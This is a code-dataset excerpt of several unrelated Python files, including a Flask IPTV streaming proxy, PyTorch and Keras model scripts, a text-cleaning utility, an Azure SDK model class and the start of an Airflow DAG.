existing_type=String(50))\n\n def increase_user_email2_length(self):\n # Match EMAIL_LENGTH\n self.op.alter_column('users',\n 'email2',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n","sub_path":"opengever/ogds/base/upgrades/to4301.py","file_name":"to4301.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"54427802","text":"import stb\nfrom flask import Flask, render_template, redirect, request, Response\nfrom pathlib import Path\nimport os\nimport sys\nimport json\nfrom urllib import parse\nimport subprocess\n\n\napp = Flask(__name__)\nbasePath = Path(__file__).resolve().parent\n\n\nif os.getenv(\"HOST\"):\n host = os.getenv(\"HOST\")\nelse:\n host = \"localhost:8001\"\n\nif os.getenv(\"CONFIG\"):\n config_file = os.getenv(\"CONFIG\")\nelse:\n config_file = str(basePath) + \"/config.json\"\n\n\ndef getPortals():\n try:\n with open(config_file) as f:\n data = json.load(f)\n portals = data[\"portals\"]\n except:\n print(\"Creating config file\")\n data = {}\n data[\"portals\"] = []\n portals = []\n savePortals(portals)\n return portals\n\n\ndef savePortals(portals):\n with open(config_file, \"w\") as f:\n data = {}\n data[\"portals\"] = portals\n json.dump(data, f, indent=4)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef home():\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portals\", methods=[\"GET\"])\ndef portals():\n names = []\n masterBlacklist = \"^((?=[a-zA-Z0-9_-]+).)*$\"\n blacklists = []\n portals = getPortals()\n if portals and len(portals) > 0:\n for i in portals:\n names.append(i[\"name\"])\n # ^((?!^word1$|^word2$)(?=[a-zA-Z0-9_-]+).)*$\n masterBlacklist = \"^((?!^\" + (\"$|^\".join(names)) + \"$)(?=[a-zA-Z0-9_-]+).)*$\"\n for i in portals:\n inames = names.copy()\n iname = i[\"name\"]\n inames.remove(iname)\n blacklist = \"^((?!^\" + (\"$|^\".join(inames)) + \"$)(?=[a-zA-Z0-9_-]+).)*$\"\n blacklists.append(blacklist)\n return render_template(\n \"portals.html\",\n portals=portals,\n masterBlacklist=masterBlacklist,\n blacklists=blacklists,\n )\n\n\n@app.route(\"/portal/add\", methods=[\"POST\"])\ndef portalsAdd():\n name = 
request.form[\"name\"]\n url = stb.getUrl(request.form[\"url\"])\n mac = request.form[\"mac\"]\n proxy = request.form[\"proxy\"]\n format = request.form[\"format\"]\n try:\n portals = getPortals()\n token = stb.getToken(url, mac)\n expiry = stb.getExpires(url, mac, token)\n portals.append(\n {\n \"name\": name,\n \"url\": url,\n \"mac\": mac,\n \"proxy\": proxy,\n \"format\": format,\n \"expires\": expiry,\n \"enabled channels\": [],\n \"custom channel names\": {},\n \"custom genres\": {},\n }\n )\n savePortals(portals)\n except:\n print(sys.exc_info()[1])\n pass\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portal/update\", methods=[\"POST\"])\ndef portalUpdate():\n name = request.form[\"name\"]\n oname = request.form[\"oname\"]\n url = stb.getUrl(request.form[\"url\"])\n mac = request.form[\"mac\"]\n proxy = request.form[\"proxy\"]\n format = request.form[\"format\"]\n try:\n portals = getPortals()\n token = stb.getToken(url, mac)\n expiry = stb.getExpires(url, mac, token)\n for i in range(len(portals)):\n if portals[i][\"name\"] == oname:\n portals[i][\"name\"] = name\n portals[i][\"url\"] = url\n portals[i][\"mac\"] = mac\n portals[i][\"proxy\"] = proxy\n portals[i][\"format\"] = format\n portals[i][\"expires\"] = expiry\n savePortals(portals)\n break\n except:\n print(sys.exc_info()[1])\n pass\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portal/remove\", methods=[\"POST\"])\ndef portalRemove():\n name = request.form[\"name\"]\n portals = getPortals()\n for i in range(len(portals)):\n if portals[i][\"name\"] == name:\n portals.pop(i)\n break\n savePortals(portals)\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/editor\", methods=[\"GET\"])\ndef editor():\n channels = []\n portals = getPortals()\n if len(portals) > 0:\n for p in portals:\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n channelName = i[\"name\"]\n genre = genres.get(i[\"tv_genre_id\"])\n if channelId in enabledChannels:\n enabled = True\n else:\n enabled = False\n customChannelName = customChannelNames.get(channelId)\n if customChannelName == None:\n customChannelName = \"\"\n customGenre = customGenres.get(channelId)\n if customGenre == None:\n customGenre = \"\"\n channels.append(\n {\n \"enabled\": enabled,\n \"channelName\": channelName,\n \"customChannelName\": customChannelName,\n \"genre\": genre,\n \"customGenre\": customGenre,\n \"channelId\": channelId,\n \"portalName\": portalName,\n }\n )\n except:\n print(sys.exc_info()[1])\n pass\n return render_template(\"editor.html\", channels=channels)\n\n\n@app.route(\"/editor/save\", methods=[\"POST\"])\ndef editorSave():\n enabledEdits = json.loads(request.form[\"enabledEdits\"])\n nameEdits = json.loads(request.form[\"nameEdits\"])\n genreEdits = json.loads(request.form[\"genreEdits\"])\n portals = getPortals()\n for e in enabledEdits:\n portal = e[\"portal\"]\n chid = e[\"channel id\"]\n enabled = e[\"enabled\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n enabledChannels = p[\"enabled channels\"]\n if enabled:\n enabledChannels.append(chid)\n else:\n enabledChannels.remove(chid)\n enabledChannels = list(set(enabledChannels))\n portals[i][\"enabled channels\"] = 
enabledChannels\n break\n for n in nameEdits:\n portal = n[\"portal\"]\n chid = n[\"channel id\"]\n customName = n[\"custom name\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n customChannelNames = p[\"custom channel names\"]\n if customName:\n customChannelNames.update({chid: customName})\n else:\n customChannelNames.pop(chid)\n portals[i][\"custom channel names\"] = customChannelNames\n break\n for g in genreEdits:\n portal = g[\"portal\"]\n chid = g[\"channel id\"]\n customGenre = g[\"custom genre\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n customGenres = p[\"custom genres\"]\n if customGenre:\n customGenres.update({chid: customGenre})\n else:\n customGenres.pop(chid)\n portals[i][\"custom genres\"] = customGenres\n break\n savePortals(portals)\n return redirect(\"/editor\", code=302)\n\n\n@app.route(\"/player\", methods=[\"GET\"])\ndef player():\n channels = []\n for p in getPortals():\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n proxy = p[\"proxy\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n if len(enabledChannels) != 0:\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n if channelId in enabledChannels:\n cmd = i[\"cmd\"]\n channelName = customChannelNames.get(channelId)\n if channelName == None:\n channelName = i[\"name\"]\n genre = customGenres.get(channelId)\n if genre == None:\n genre = genres.get(i[\"tv_genre_id\"])\n epg = stb.getShortEpg(channelId, url, mac, token)\n try:\n now = epg[0][\"name\"]\n except:\n now = \"No data\"\n try:\n nex = epg[1][\"name\"]\n except:\n nex = \"No data\"\n query = parse.urlencode(\n {\n \"portalName\": portalName,\n \"url\": url,\n \"mac\": mac,\n \"cmd\": cmd,\n \"proxy\": proxy,\n \"format\": \"mp4\",\n }\n )\n link = \"http://\" + host + \"/play?\" + query\n channels.append(\n {\n \"name\": channelName,\n \"genre\": genre,\n \"link\": link,\n \"now\": now,\n \"next\": nex,\n }\n )\n channels.sort(key=lambda k: k[\"name\"])\n except:\n print(sys.exc_info()[1])\n pass\n return render_template(\"player.html\", channels=channels)\n\n\n@app.route(\"/playlist\", methods=[\"GET\"])\ndef playlist():\n channels = []\n for p in getPortals():\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n proxy = p[\"proxy\"]\n format = p[\"format\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n if len(enabledChannels) != 0:\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n if channelId in enabledChannels:\n cmd = i[\"cmd\"]\n channelName = customChannelNames.get(channelId)\n if channelName == None:\n channelName = i[\"name\"]\n genre = customGenres.get(channelId)\n if genre == None:\n genre = genres.get(i[\"tv_genre_id\"])\n query = parse.urlencode(\n {\n \"portalName\": portalName,\n \"url\": url,\n \"mac\": mac,\n \"cmd\": cmd,\n \"proxy\": proxy,\n \"format\": format,\n }\n )\n channels.append(\n '#EXTINF:-1 group-title=\"'\n + genre\n + '\",'\n + channelName\n + \"\\n\"\n + \"http://\"\n + host\n + \"/play?\"\n + query\n )\n except:\n print(sys.exc_info()[1])\n pass\n channels.sort(key=lambda k: k.split(\",\")[1])\n playlist = \"#EXTM3U 
\n\"\n    playlist = playlist + \"\\n\".join(channels)\n    return Response(playlist, mimetype=\"text/plain\")\n\n\n@app.route(\"/play\", methods=[\"GET\"])\ndef channel():\n    def streamData(link, proxy, format):\n        if format == \"mp4\":\n            ffmpegcmd = [\n                \"ffmpeg\",\n                \"-re\",\n                \"-loglevel\",\n                \"panic\",\n                \"-hide_banner\",\n                \"-i\",\n                link,\n                \"-vcodec\",\n                \"copy\",\n                \"-f\",\n                \"mp4\",\n                \"-movflags\",\n                \"frag_keyframe+empty_moov\",\n                \"pipe:\",\n            ]\n        elif format == \"mpegts\":\n            ffmpegcmd = [\n                \"ffmpeg\",\n                \"-re\",\n                \"-loglevel\",\n                \"panic\",\n                \"-hide_banner\",\n                \"-i\",\n                link,\n                \"-c\",\n                \"copy\",\n                \"-f\",\n                \"mpegts\",\n                \"pipe:\",\n            ]\n        elif format == \"hls\":\n            ffmpegcmd = [\n                \"ffmpeg\",\n                \"-re\",\n                \"-loglevel\",\n                \"panic\",\n                \"-hide_banner\",\n                \"-i\",\n                link,\n                \"-c\",\n                \"copy\",\n                \"-f\",\n                \"hls\",\n                \"pipe:\",\n            ]\n\n        if proxy:\n            ffmpegcmd.insert(5, \"-http_proxy\")\n            ffmpegcmd.insert(6, proxy)\n\n        try:\n            ffmpeg_sb = subprocess.Popen(\n                ffmpegcmd, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE\n            )\n            for stdout_line in iter(ffmpeg_sb.stdout.readline, b\"\"):\n                yield stdout_line\n        finally:\n            ffmpeg_sb.terminate()\n\n    url = request.args.get(\"url\")\n    mac = request.args.get(\"mac\")\n    cmd = request.args.get(\"cmd\")\n    proxy = request.args.get(\"proxy\")\n    format = request.args.get(\"format\")\n    if format == \"redirect\":\n        try:\n            token = stb.getToken(url, mac)\n            if \"http://localhost/\" in cmd: \n                link = stb.getLink(url, mac, token, cmd)\n            else:\n                link = cmd.split(\" \")[1]\n            return redirect(link, code=302)\n        except:\n            print(sys.exc_info()[1])\n            pass\n    else:\n        try:\n            token = stb.getToken(url, mac)\n            if \"http://localhost/\" in cmd: \n                link = stb.getLink(url, mac, token, cmd)\n            else:\n                link = cmd.split(\" \")[1]\n            return Response(streamData(link, proxy, format))\n        except:\n            print(sys.exc_info()[1])\n            pass\n\n\nif __name__ == \"__main__\":\n    app.run(host=\"0.0.0.0\", port=8001, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"17039060","text":"import numpy as np\nimport pickle\nimport os\nfrom PIL import Image\nimport time\nfrom tqdm import tqdm\nimport shutil\nfrom random import randint\nimport argparse\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom dataloader import spatial_dataloader\nfrom utils import *\nfrom network import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# set up the command-line arguments\nparser = argparse.ArgumentParser(description='UCF101 spatial stream on resnet101')\nparser.add_argument('--epochs', default=2, type=int, metavar='N', help='number of total epochs')\nparser.add_argument('--batch-size', default=16, type=int, metavar='N', help='mini-batch size (default: 25)')\nparser.add_argument('--lr', default=5e-4, type=float, metavar='LR', help='initial learning rate')\nparser.add_argument('--evaluate', dest='evaluate', action='store_true', help='evaluate model on validation set')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\ndef main():\n    global arg\n    arg = parser.parse_args()\n    print(arg)\n\n    #Prepare 
DataLoader\n    data_loader = spatial_dataloader(\n        BATCH_SIZE=arg.batch_size,\n        # number of worker processes\n        num_workers=8,\n        path='/home/yzy20161103/csce636project/two-stream-action-recognition/video_data/',\n        ucf_list ='/home/yzy20161103/csce636project/two-stream-action-recognition/UCF_list/',\n        ucf_split ='01', \n        )\n    \n    train_loader, test_loader, test_video = data_loader.run()\n    #Model \n    model = Spatial_CNN(\n        nb_epochs=arg.epochs,\n        lr=arg.lr,\n        batch_size=arg.batch_size,\n        resume=arg.resume,\n        start_epoch=arg.start_epoch,\n        evaluate=arg.evaluate,\n        test_loader=test_loader,\n        test_video=test_video\n    )\n    #Training\n    model.run()\n\nclass Spatial_CNN():\n    def __init__(self, nb_epochs, lr, batch_size, resume, start_epoch, evaluate, test_loader, test_video):\n        self.nb_epochs=nb_epochs\n        self.lr=lr\n        self.batch_size=batch_size\n        self.resume=resume\n        self.start_epoch=start_epoch\n        self.evaluate=evaluate\n        self.test_loader=test_loader\n        self.best_prec1=0\n        self.test_video=test_video\n\n    def build_model(self):\n        print ('==> Build model and setup loss and optimizer')\n        #build model\n        self.model = resnet101(pretrained= True, channel=3).cuda()\n        #Loss function and optimizer\n        self.criterion = nn.CrossEntropyLoss().cuda()\n        self.optimizer = torch.optim.SGD(self.model.parameters(), self.lr, momentum=0.9)\n        self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=1,verbose=True)\n    \n    def resume_and_evaluate(self):\n        if self.resume:\n            if os.path.isfile(self.resume):\n                print(\"==> loading checkpoint '{}'\".format(self.resume))\n                checkpoint = torch.load(self.resume)\n                self.start_epoch = checkpoint['epoch']\n                self.best_prec1 = checkpoint['best_prec1']\n                self.model.load_state_dict(checkpoint['state_dict'])\n                self.optimizer.load_state_dict(checkpoint['optimizer'])\n                print(\"==> loaded checkpoint '{}' (epoch {}) (best_prec1 {})\"\n                  .format(self.resume, checkpoint['epoch'], self.best_prec1))\n            else:\n                print(\"==> no checkpoint found at '{}'\".format(self.resume))\n        if self.evaluate:\n            self.epoch = 0\n            prec1, val_loss = self.validate_1epoch()\n            return\n\n    def run(self):\n        self.build_model()\n        self.resume_and_evaluate()\n    \n\n    def validate_1epoch(self):\n        print('==> Epoch:[{0}/{1}][validation stage]'.format(self.epoch, self.nb_epochs))\n        batch_time = AverageMeter()\n        losses = AverageMeter()\n        top1 = AverageMeter()\n        # switch to evaluate mode\n        self.model.eval()\n        self.dic_video_level_preds={}\n        end = time.time()\n        progress = tqdm(self.test_loader)\n        with torch.no_grad():\n            for i, (keys,data,label) in enumerate(progress):\n            \n                label = label.cuda()\n                data = data.cuda()\n\n                # compute output\n                output = self.model(data)\n                # measure elapsed time\n                batch_time.update(time.time() - end)\n                end = time.time()\n                #Calculate video level prediction\n                preds = output.data.cpu().numpy()\n                nb_data = preds.shape[0]\n                for j in range(nb_data):\n                    videoName = keys[j].split('/',1)[0]\n                    if videoName not in self.dic_video_level_preds.keys():\n                        self.dic_video_level_preds[videoName] = preds[j,:]\n                    else:\n                        self.dic_video_level_preds[videoName] += preds[j,:]\n        print(self.dic_video_level_preds)\n        video_top1, video_loss = self.frame2_video_level_accuracy()\n            \n        \n        info = {'Epoch':[self.epoch],\n                'Batch Time':[round(batch_time.avg,3)],\n                'Loss':[np.round(video_loss,5)],\n                'Prec@1':[np.round(video_top1,3)]}\n        #record_info(info, 'record/spatial/rgb_test.csv','test')\n        return video_top1, video_loss\n\n    def frame2_video_level_accuracy(self):\n     \n        correct = 0\n        video_level_preds = np.zeros((len(self.dic_video_level_preds),2))\n        video_level_labels = 
np.zeros(len(self.dic_video_level_preds))\n ii=0\n for name in sorted(self.dic_video_level_preds.keys()):\n \n preds = self.dic_video_level_preds[name]\n label = int(self.test_video[name])-1\n \n video_level_preds[ii,:] = preds\n video_level_labels[ii] = label\n ii+=1 \n if np.argmax(preds) == (label):\n correct+=1\n\n video_level_labels = torch.from_numpy(video_level_labels).long()\n video_level_preds = torch.from_numpy(video_level_preds).float()\n \n top1 = accuracy(video_level_preds, video_level_labels, topk=(1,))\n loss = self.criterion(Variable(video_level_preds).cuda(), Variable(video_level_labels).cuda()) \n \n top1 = float(top1[0].numpy())\n \n #print(' * Video level Prec@1 {top1:.3f}, Video level Prec@5 {top5:.3f}'.format(top1=top1, top5=top5))\n return top1,loss.data.cpu().numpy()\n\n\n\n\n\n\n\nif __name__=='__main__':\n main()\n","sub_path":"test_spatial_cnn.py","file_name":"test_spatial_cnn.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41472182","text":"from keras.layers import Dropout, Flatten, Dense\nfrom keras.models import Model\nfrom keras.applications.vgg16 import VGG16\n\nwidth = 224\nheight = 224\nvgg16_no_dense = VGG16(include_top=False, weights='imagenet', input_shape=(width, height, 3))\n\nmodel = Flatten(name=\"flatten\")(vgg16_no_dense.output)\nmodel = Dense(4096, activation='relu', name='fc1')(model)\nmodel = Dense(4096, activation='relu', name='fc2')(model)\nmodel = Dropout(0.5)(model)\n\nmodel = Dense(1,activation='sigmoid')(model)\nmodel_vgg = Model(vgg16_no_dense.input, model, name='vgg16')\n\nmodel_vgg.summary()\n","sub_path":"keras/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"28511269","text":"from leveleditorlibs import tool, resources, graphics, draw, level\n\nclass PlayerStart(tool.Tool):\n def start_drawing(self, x, y):\n level.player_x = x\n level.player_y = y\n \n def stop_drawing(self, x, y):\n self.start_drawing(x,y)\n \n def keep_drawing(self, x, y, dx, dy):\n level.player_x = x\n level.player_y = y\n\ndefault = PlayerStart()\npriority = 1\ngroup = 'Events'\nimage = resources.PlayerStart\ncursor = graphics.cursor['CURSOR_DEFAULT']\n","sub_path":"Editor/Tools/PlayerStart.py","file_name":"PlayerStart.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"567113297","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport csv\nimport re\nimport unicodedata\nimport string\nimport logging\n\nimport io_files\n\n\nlogger = logging.getLogger(\"Clean Data\")\nlogger.setLevel(logging.INFO)\n\n\ndef description(product):\n return product[4]\n\n\ndef libelle(product):\n return product[5]\n\n\nshortword = re.compile(r'\\W*\\b\\w{1,3}\\b')\n\n\ndef remove_shortwords(s):\n return shortword.sub('', s)\n\n\ndef remove_accents(s):\n unicode_string = s.decode('utf-8')\n nkfd_form = unicodedata.normalize('NFKD', unicode_string)\n return u\"\".join([c.encode('ascii', 'ignore') for c in nkfd_form if not unicodedata.combining(c)])\n\n\ndef clearup(s):\n s = re.sub('[%s]' % '-', '', s)\n return re.sub('[%s]' % string.punctuation, ' ', s)\n\n\npattern = re.compile(r'\\d')\n\n\ndef remove_numbers(s):\n if pattern.findall(s):\n s += \" XXXX\"\n return re.sub(\"[a-z]*[0-9]+[a-z0-9]*\", '', s)\n\n\ndef remove_spaces(s):\n return re.sub(' +', ' ', 
s).strip()\n\n\nstop_words_set = set(remove_accents(line.strip()) for line in open(io_files.stopwords_path))\n\n\ndef remove_stopwords(s):\n words = s.split()\n res = \"\"\n for w in words:\n if not (w in stop_words_set):\n res += w + \" \"\n return res\n\n\ndef clean_string(s):\n s = s.lower()\n s = remove_accents(s)\n s = clearup(s)\n s = remove_numbers(s)\n s = remove_shortwords(s)\n s = remove_stopwords(s)\n s = remove_spaces(s)\n return s.lower()\n\n\ndef clean_product(product):\n pre_columns = [product[i] for i in xrange(4)]\n post_columns = [product[i] for i in xrange(6, 8)]\n\n cleaned_description = clean_string(description(product))\n cleaned_libelle = clean_string(libelle(product))\n# cleaned_marque = clean_string(marque(product))\n\n return pre_columns + [cleaned_description, cleaned_libelle] + post_columns\n\n\ndef clean_data(source_path, dest_path):\n\n \"\"\"\n\n :type dest_path:utf8\n \"\"\"\n\n logger.info(\"Clean data start\")\n\n with open(dest_path, 'wb') as dest:\n writer = csv.writer(dest, delimiter=';')\n\n with open(source_path, 'r') as f:\n reader = csv.reader(f, delimiter=\";\")\n\n for product in reader:\n cleaned = clean_product(product)\n writer.writerow(cleaned)\n\n logger.info(\"Clean data end\")\n\n# clean_data(\"working_data.csv\", \"clean_data.csv\")\n\n# clean_data(io_files.shuffle_path, io_files.clean_path)\n\n# s =\"Veste peak Moutain New collection - Peak Mountain ·êß Veste matelassée pour femmes, résistant au froid, résistant\n# à la neige, résistant à la pluie léger et résistant ·êß - cap… Voir la présentation\"\n\n# print clean_string(s)\n","sub_path":"CDiscount/src/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"311056210","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ArmRollingUpgradeMonitoringPolicy(Model):\n \"\"\"The policy used for monitoring the application upgrade.\n\n :param failure_action: The activation Mode of the service package.\n Possible values include: 'Rollback', 'Manual'\n :type failure_action: str or\n ~azure.mgmt.servicefabric.models.ArmUpgradeFailureAction\n :param health_check_wait_duration: The amount of time to wait after\n completing an upgrade domain before applying health policies. It is first\n interpreted as a string representing an ISO 8601 duration. If that fails,\n then it is interpreted as a number representing the total number of\n milliseconds.\n :type health_check_wait_duration: str\n :param health_check_stable_duration: The amount of time that the\n application or cluster must remain healthy before the upgrade proceeds to\n the next upgrade domain. It is first interpreted as a string representing\n an ISO 8601 duration. 
If that fails, then it is interpreted as a number\n representing the total number of milliseconds.\n :type health_check_stable_duration: str\n :param health_check_retry_timeout: The amount of time to retry health\n evaluation when the application or cluster is unhealthy before\n FailureAction is executed. It is first interpreted as a string\n representing an ISO 8601 duration. If that fails, then it is interpreted\n as a number representing the total number of milliseconds.\n :type health_check_retry_timeout: str\n :param upgrade_timeout: The amount of time the overall upgrade has to\n complete before FailureAction is executed. It is first interpreted as a\n string representing an ISO 8601 duration. If that fails, then it is\n interpreted as a number representing the total number of milliseconds.\n :type upgrade_timeout: str\n :param upgrade_domain_timeout: The amount of time each upgrade domain has\n to complete before FailureAction is executed. It is first interpreted as a\n string representing an ISO 8601 duration. If that fails, then it is\n interpreted as a number representing the total number of milliseconds.\n :type upgrade_domain_timeout: str\n \"\"\"\n\n _attribute_map = {\n 'failure_action': {'key': 'failureAction', 'type': 'str'},\n 'health_check_wait_duration': {'key': 'healthCheckWaitDuration', 'type': 'str'},\n 'health_check_stable_duration': {'key': 'healthCheckStableDuration', 'type': 'str'},\n 'health_check_retry_timeout': {'key': 'healthCheckRetryTimeout', 'type': 'str'},\n 'upgrade_timeout': {'key': 'upgradeTimeout', 'type': 'str'},\n 'upgrade_domain_timeout': {'key': 'upgradeDomainTimeout', 'type': 'str'},\n }\n\n def __init__(self, *, failure_action=None, health_check_wait_duration: str=None, health_check_stable_duration: str=None, health_check_retry_timeout: str=None, upgrade_timeout: str=None, upgrade_domain_timeout: str=None, **kwargs) -> None:\n super(ArmRollingUpgradeMonitoringPolicy, self).__init__(**kwargs)\n self.failure_action = failure_action\n self.health_check_wait_duration = health_check_wait_duration\n self.health_check_stable_duration = health_check_stable_duration\n self.health_check_retry_timeout = health_check_retry_timeout\n self.upgrade_timeout = upgrade_timeout\n self.upgrade_domain_timeout = upgrade_domain_timeout\n","sub_path":"sdk/servicefabric/azure-mgmt-servicefabric/azure/mgmt/servicefabric/models/arm_rolling_upgrade_monitoring_policy_py3.py","file_name":"arm_rolling_upgrade_monitoring_policy_py3.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"362542706","text":"import sys\nimport argparse\n\nimport yaml\n\nfrom utils.trainer import Trainer\n\n\nDESCRIPTION = \"\"\"Train and evaluate a BERT for address extraction model.\"\"\"\n\n\ndef main(args):\n with open(args.config_path, \"r\") as conf:\n config = yaml.load(conf, Loader=yaml.FullLoader)\n config[\"action\"] = \"training\"\n config[\"resume_from\"] = args.resume_from\n config[\"load_from\"] = args.load_from\n config[\"config_path\"] = args.config_path\n\n # Initializer trainer\n trainer = Trainer(config)\n\n # Start training\n trainer.train()\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=DESCRIPTION)\n parser.add_argument(\n '-c', '--config-path', type=str, required=True,\n help='Path to full config.')\n parser.add_argument(\n '-r', '--resume-from', type=str, required=False, default=None,\n 
help='Directory to resume from.')\n    parser.add_argument(\n        '-l', '--load-from', type=str, required=False, default=None,\n        help='Path to pretrained model to load from.')\n\n    return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n    main(parse_arguments(sys.argv[1:]))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"602104692","text":"import os\nimport json\nimport numpy as np\n\n\ndef json2txt(path_json, path_txt):\n    with open(path_json, 'r', encoding='gb18030') as path_json:\n        jsonx = json.load(path_json)\n        with open(path_txt, 'w+') as ftxt:\n            for shape in jsonx['shapes']:\n                xy = np.array(shape['points'])\n                # label=str(shape['label'])\n                strxy = []\n                for m, n in xy:\n                    strxy.append(str(m) + ',' + str(n))\n                    # strxy+=str(m)+','+str(n)+','\n                # strxy+=label\n                ftxt.writelines(','.join(strxy) + \"\\n\")\n\n\ndir_json = r'F:\\ServerSpace\\labelfile\\labels'  # path to the json files\ndir_txt = r'F:\\ServerSpace\\labelfile\\txt'  # path for saving the txt files\nif not os.path.exists(dir_txt):\n    os.makedirs(dir_txt)\nlist_json = os.listdir(dir_json)\nfor cnt, json_name in enumerate(list_json):\n    print('cnt=%d,name=%s' % (cnt, json_name))\n    path_json = os.path.join(dir_json, json_name)\n    path_txt = dir_txt + json_name.replace('.json', '.txt')\n    # print(path_json, path_txt)\n    json2txt(path_json, path_txt)\n","sub_path":"TargetDetection/jb/json-txt.py","file_name":"json-txt.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"174009782","text":"from Project_Euler import factors\r\nfrom time import time\r\n\r\n\r\ndef get_lens(x):\r\n    return [1 + i for i in factors(2**x - 1)]\r\n\r\n\r\ndef get_mins(x):\r\n    lower_mins = set()\r\n    t1 = time()\r\n    for i in range(1, x):\r\n        lower_mins = lower_mins.union(set(get_lens(i)))\r\n        print(f'got {i} in {time()-t1} s')\r\n    return set(get_lens(x)).difference(lower_mins)\r\n\r\n\r\nprint(sum(get_mins(60)))","sub_path":"PE622.py","file_name":"PE622.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"247169116","text":"import logging\nfrom datetime import timedelta\n\nfrom airflow import DAG, macros\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.hive_operator import HiveOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils import timezone\n\nimport pandas as pd\n\n\ndefault_args = {\n    'owner': 'zkan',\n    'email': ['zkan@hey.com'],\n    'sla': timedelta(seconds=30),\n}\ndag = DAG(\n    'transaction_load_pipeline',\n    schedule_interval='0 0 * * THU',  # We can then use {{ macros.ds_add(ds, -1) }}\n    default_args=default_args,\n    start_date=timezone.datetime(2009, 1, 1),\n    catchup=False,\n)\n\nstart = DummyOperator(\n    task_id='start',\n    dag=dag,\n)\n\nDATA_FOLDER = '/usr/local/airflow/dags/files'\n\ndef query_data_by_week_end_date_func(ds):\n    week_end_date = macros.ds_format(ds, '%Y-%m-%d', '%d-%b-%y')\n\n    df = pd.read_csv(f'{DATA_FOLDER}/transaction-data-table.csv', header=1)\n    new_df = df[df.WEEK_END_DATE == week_end_date]\n    new_df.to_csv(f'{DATA_FOLDER}/transaction-{ds}.csv', index=False, header=True)\n    \n\n# Query data by week end date\nquery_data_by_week_end_date = PythonOperator(\n    task_id='query_data_by_week_end_date',\n    
